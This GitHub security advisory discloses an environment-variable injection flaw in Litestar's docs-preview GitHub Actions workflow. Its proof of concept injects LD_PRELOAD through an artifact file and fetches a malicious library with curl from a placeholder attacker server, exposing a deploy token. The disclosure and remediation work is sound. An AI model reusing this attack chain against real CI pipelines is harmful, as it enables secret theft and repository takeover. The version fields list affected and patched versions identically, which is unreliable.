Skip to content

Environment Variable injection in `docs-preview.yml` workflow

High
JacobCoffee published GHSA-4hq2-rpgc-r8r7 Aug 9, 2024

Package

actions dawidd6/action-download-artifact (GitHub Actions)

Affected versions

<=6

Patched versions

<=6

Description

Summary

Litestar's docs-preview.yml workflow is vulnerable to Environment Variable injection which may lead to secret exfiltration and repository manipulation.

Environment Variable injection (GHSL-2024-177)

The docs-preview.yml workflow gets triggered when the Tests And Linting workflow completes:

on:
  workflow_run:
    workflows: [Tests And Linting]
    types: [completed]

Later, it downloads and extracts an artifact generated by the triggering workflow:

- name: Download artifact
uses: dawidd6/action-download-artifact@v6
with:
  workflow_conclusion: success
  run_id: ${{ github.event.workflow_run.id }}
  path: docs-preview
  name: docs-preview

And reads docs-preview/.pr_number into an Environment Variable:

- name: Set PR number
  run: echo "PR_NUMBER=$(cat docs-preview/.pr_number)" >> $GITHUB_ENV

The $GITHUB_ENV pointed file is just a regular file where every KEY=VALUE will be used to define a new Environment Variable after the step completes. Since the contents of the .pr_number file have not been validated, they may contain new lines that will cause new Environment Variables to be defined.

An attacker can send a malicious .pr_number file with the following content:

111
LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so

Which will result in two Environment Variables being defined:

  • PR_NUMBER=111
  • LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so

In this example we are manipulating the LD_PRELOAD environment variable to force the system to load a malicious shared library called inject.so. As a result, all subsequent processes launched will automatically incorporate this compromised library into their execution environment.

The following step will run the JamesIves/github-pages-deploy-action action which will run the node command. Therefore the LD_PRELOAD will execute arbitrary code when node gets executed:

- name: Deploy docs preview
  uses: JamesIves/github-pages-deploy-action@v4
  with:
    folder: docs-preview/docs/_build/html
    token: ${{ secrets.DOCS_PREVIEW_DEPLOY_TOKEN }}
    repository-name: litestar-org/litestar-docs-preview
    clean: false
    target-folder: ${{ env.PR_NUMBER }}
    branch: gh-pages

PoC

  • Clone the repository
  • Edit the ci.yml workflow.
name: Tests And Linting

on:
  pull_request:

jobs:
  upload-patch:
    runs-on: ubuntu-latest
    timeout-minutes: 10
    steps:
      - name: Save PR number and payload
        run: |
          make payload
          echo -e "${{ github.event.number }}\nLD_PRELOAD=/home/runner/work/litestar/litestar/inject.so" > payload/.pr_number
          curl http://<ATTACKER SERVER>/inject.so -o payload/inject.so

      - name: Upload artifact
        uses: actions/upload-artifact@v3
        with:
          name: docs-preview
          path: payload
  • Create a Pull Request with this change.
  • Since the modified workflow is triggered on pull_request, the attacker Pull Request will trigger it and upon completion will trigger the vulnerable Deploy documentation preview workflow which will read the malicious artifact and pollute the Environment Variables.

Impact

This issue will grant a malicious actor the following permissions:

  Issues: write
  Metadata: read
  PullRequests: write

In addition, the following secret will get exposed to the attacker: DOCS_PREVIEW_DEPLOY_TOKEN

Remediation

  • Verify the contents of the downloaded artifacts.
  • Do not allow new lines in the value redirected to GITHUB_ENV

Resources

Disclosure Policy

This report is subject to a 90-day disclosure deadline, as described in more detail in our coordinated disclosure policy.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE ID

CVE-2024-42370

Weaknesses

No CWEs

Credits